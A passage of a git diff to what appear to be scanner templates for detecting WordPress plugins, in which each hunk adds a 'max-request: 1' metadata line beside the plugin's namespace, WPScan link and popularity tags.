b/http/technologies/wordpress/plugins/formidable.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/formidable/ metadata: + max-request: 1 plugin_namespace: formidable wpscan: https://wpscan.com/plugin/formidable tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index 980265f531..91c89d0ad8 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/forminator/ metadata: + max-request: 1 plugin_namespace: forminator wpscan: https://wpscan.com/plugin/forminator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index daf205789d..539d9f7cec 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ga-google-analytics/ metadata: + max-request: 1 plugin_namespace: ga-google-analytics wpscan: https://wpscan.com/plugin/ga-google-analytics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 22bfa3ffe2..f4123bb594 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/gdpr-cookie-compliance/ metadata: + max-request: 1 plugin_namespace: gdpr-cookie-compliance wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 7ed171d662..254f916291 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-analytics-dashboard-for-wp/ metadata: + max-request: 1 plugin_namespace: google-analytics-dashboard-for-wp wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index ad238445fc..8074ac337e 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-analytics-for-wordpress/ metadata: + max-request: 1 plugin_namespace: google-analytics-for-wordpress wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index 7161671960..b9de0ee313 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-listings-and-ads/ metadata: + max-request: 1 plugin_namespace: google-listings-and-ads wpscan: https://wpscan.com/plugin/google-listings-and-ads tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 2678f603c6..7b0f188ff7 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-site-kit/ metadata: + max-request: 1 plugin_namespace: google-site-kit wpscan: https://wpscan.com/plugin/google-site-kit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 20d947a5d1..898e4de56d 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-sitemap-generator/ metadata: + max-request: 1 plugin_namespace: google-sitemap-generator wpscan: https://wpscan.com/plugin/google-sitemap-generator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 22ee97b51f..4a76856a69 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/gtranslate/ metadata: + max-request: 1 plugin_namespace: gtranslate wpscan: https://wpscan.com/plugin/gtranslate tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 3f4c6c8936..b321ca63eb 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/gutenberg/ metadata: + max-request: 1 plugin_namespace: gutenberg wpscan: https://wpscan.com/plugin/gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index fa1bb64115..2b42c9f80c 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/happy-elementor-addons/ metadata: + max-request: 1 plugin_namespace: happy-elementor-addons wpscan: https://wpscan.com/plugin/happy-elementor-addons tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml b/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml index a8eca7b056..2409c6b370 100644 --- a/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml +++ b/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-and-footer-scripts/ metadata: + max-request: 1 plugin_namespace: header-and-footer-scripts wpscan: https://wpscan.com/plugin/header-and-footer-scripts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index da63d1cbf6..dbea07a6da 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-footer-code-manager/ metadata: + max-request: 1 plugin_namespace: header-footer-code-manager wpscan: https://wpscan.com/plugin/header-footer-code-manager tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index f94e7f6494..17a8f220cf 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-footer-elementor/ metadata: + max-request: 1 plugin_namespace: header-footer-elementor wpscan: https://wpscan.com/plugin/header-footer-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 95d2aa5f16..956a08b32d 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-footer/ metadata: + max-request: 1 plugin_namespace: header-footer wpscan: https://wpscan.com/plugin/header-footer tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index af8193b875..5a570b9077 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/health-check/ metadata: + max-request: 1 plugin_namespace: health-check wpscan: https://wpscan.com/plugin/health-check tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 8d7e45818b..4ecac0cd92 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/hello-dolly/ metadata: + max-request: 1 plugin_namespace: hello-dolly wpscan: https://wpscan.com/plugin/hello-dolly tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index ed3967db7b..e50f58cef8 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/host-webfonts-local/ metadata: + max-request: 1 plugin_namespace: host-webfonts-local wpscan: https://wpscan.com/plugin/host-webfonts-local tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 2ff5adba86..031bb48563 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/imagify/ metadata: + max-request: 1 plugin_namespace: imagify wpscan: https://wpscan.com/plugin/imagify tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 9099f3c0a5..3cdcf3da93 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/imsanity/ metadata: + max-request: 1 plugin_namespace: imsanity wpscan: https://wpscan.com/plugin/imsanity tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 1ee0e67542..c222bc9d4a 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/insert-headers-and-footers/ metadata: + max-request: 1 plugin_namespace: insert-headers-and-footers wpscan: https://wpscan.com/plugin/insert-headers-and-footers tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 43cb2ab09c..c8acf8c625 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/instagram-feed/ metadata: + max-request: 1 plugin_namespace: instagram-feed wpscan: https://wpscan.com/plugin/instagram-feed tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 7ba81036cf..66b7d6a363 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/intuitive-custom-post-order/ metadata: + max-request: 1 plugin_namespace: intuitive-custom-post-order wpscan: https://wpscan.com/plugin/intuitive-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml index 24fc3e3295..a36016562d 100644 --- a/http/technologies/wordpress/plugins/iwp-client.yaml +++ b/http/technologies/wordpress/plugins/iwp-client.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/iwp-client/ metadata: + max-request: 1 plugin_namespace: iwp-client wpscan: https://wpscan.com/plugin/iwp-client tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index 3e89505574..8033aacbc6 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/jetpack-boost/ metadata: + max-request: 1 plugin_namespace: jetpack-boost wpscan: https://wpscan.com/plugin/jetpack-boost tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index e701e365ba..e4017b1a0a 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/jetpack/ metadata: + max-request: 1 plugin_namespace: jetpack wpscan: https://wpscan.com/plugin/jetpack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index c0cc5400a8..53d6d393bd 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/kadence-blocks/ metadata: + max-request: 1 plugin_namespace: kadence-blocks wpscan: https://wpscan.com/plugin/kadence-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 22687bcffe..c286e9a14f 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/kirki/ metadata: + max-request: 1 plugin_namespace: kirki wpscan: https://wpscan.com/plugin/kirki tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index b69d3d5bfe..364e3cd71e 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/leadin/ metadata: + max-request: 1 plugin_namespace: leadin wpscan: https://wpscan.com/plugin/leadin tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 7975a57702..4fcccbfc33 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts-reloaded/ metadata: + max-request: 1 plugin_namespace: limit-login-attempts-reloaded wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index ff4cef94d7..3fbc714d3b 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts/ metadata: + max-request: 1 plugin_namespace: limit-login-attempts wpscan: https://wpscan.com/plugin/limit-login-attempts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index a8903697b0..c49b506979 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/litespeed-cache/ metadata: + max-request: 1 plugin_namespace: litespeed-cache wpscan: https://wpscan.com/plugin/litespeed-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 3f141c4476..dfcaf6f71b 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/loco-translate/ metadata: + max-request: 1 plugin_namespace: loco-translate wpscan: https://wpscan.com/plugin/loco-translate tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 5355e988a2..61be246fee 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/loginizer/ metadata: + max-request: 1 plugin_namespace: loginizer wpscan: https://wpscan.com/plugin/loginizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginpress.yaml b/http/technologies/wordpress/plugins/loginpress.yaml index 6f06b49011..1c16a72d76 100644 --- a/http/technologies/wordpress/plugins/loginpress.yaml +++ b/http/technologies/wordpress/plugins/loginpress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/loginpress/ metadata: + max-request: 1 plugin_namespace: loginpress wpscan: https://wpscan.com/plugin/loginpress tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 53d409fb68..50d2e6630b 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-woocommerce/ metadata: + max-request: 1 plugin_namespace: mailchimp-for-woocommerce wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 0e908a9580..8d71f7bde9 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-wp/ metadata: + max-request: 1 plugin_namespace: mailchimp-for-wp wpscan: https://wpscan.com/plugin/mailchimp-for-wp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index aeb1875c57..5e1f97086e 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mailpoet/ metadata: + max-request: 1 plugin_namespace: mailpoet wpscan: https://wpscan.com/plugin/mailpoet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index 7c15702305..d87d456a8c 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/maintenance/ metadata: + max-request: 1 plugin_namespace: maintenance wpscan: https://wpscan.com/plugin/maintenance tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 5ce87e6c71..aa9153241e 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mainwp-child/ metadata: + max-request: 1 plugin_namespace: mainwp-child wpscan: https://wpscan.com/plugin/mainwp-child tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index c342e6b45a..09641796a3 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/malcare-security/ metadata: + max-request: 1 plugin_namespace: malcare-security wpscan: https://wpscan.com/plugin/malcare-security tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index e95041f555..28b70d09bf 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/megamenu/ metadata: + max-request: 1 plugin_namespace: megamenu wpscan: https://wpscan.com/plugin/megamenu tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 879a0d1c12..b43c10ed7a 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/members/ metadata: + max-request: 1 plugin_namespace: members wpscan: https://wpscan.com/plugin/members tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 985f5d373a..eb7e78bc7f 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/meta-box/ metadata: + max-request: 1 plugin_namespace: meta-box wpscan: https://wpscan.com/plugin/meta-box tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index bbc305b8de..3da2ea50e1 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ml-slider/ metadata: + max-request: 1 plugin_namespace: ml-slider wpscan: https://wpscan.com/plugin/ml-slider tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index 7e3e4e2d7e..7a58c58f63 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/newsletter/ metadata: + max-request: 1 plugin_namespace: newsletter wpscan: https://wpscan.com/plugin/newsletter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index 17ea142c46..5f99b8cac8 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/nextend-facebook-connect/ metadata: + max-request: 1 plugin_namespace: nextend-facebook-connect wpscan: https://wpscan.com/plugin/nextend-facebook-connect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index 953e4ab3d8..b08876df04 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/nextgen-gallery/ metadata: + max-request: 1 plugin_namespace: nextgen-gallery wpscan: https://wpscan.com/plugin/nextgen-gallery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 92107fa69c..3f68dffe06 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ninja-forms/ metadata: + max-request: 1 plugin_namespace: ninja-forms wpscan: https://wpscan.com/plugin/ninja-forms tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 5e1fe4ef5c..34f9bde1d6 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ocean-extra/ metadata: + max-request: 1 plugin_namespace: ocean-extra wpscan: https://wpscan.com/plugin/ocean-extra tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index 74fb3e6010..d9f645328f 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/official-facebook-pixel/ metadata: + max-request: 1 plugin_namespace: official-facebook-pixel wpscan: https://wpscan.com/plugin/official-facebook-pixel tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index b9f70ba555..8a1196fc9f 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/one-click-demo-import/ metadata: + max-request: 1 plugin_namespace: one-click-demo-import wpscan: https://wpscan.com/plugin/one-click-demo-import tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 6486c02c9a..05025452b7 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/optinmonster/ metadata: + max-request: 1 plugin_namespace: optinmonster wpscan: https://wpscan.com/plugin/optinmonster tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 81f58198d3..1db1b57708 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/otter-blocks/ metadata: + max-request: 1 plugin_namespace: otter-blocks wpscan: https://wpscan.com/plugin/otter-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 3743307dbc..dafe6974f6 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/password-protected/ metadata: + max-request: 1 plugin_namespace: password-protected wpscan: https://wpscan.com/plugin/password-protected tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index a4c6980041..ba05fb1e16 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/pdf-embedder/ metadata: + max-request: 1 plugin_namespace: pdf-embedder wpscan: https://wpscan.com/plugin/pdf-embedder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index adf3387ddb..7f98d822a8 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/pixelyoursite/ metadata: + max-request: 1 plugin_namespace: pixelyoursite wpscan: https://wpscan.com/plugin/pixelyoursite tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index eb6e1aaa5d..89602f4264 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ 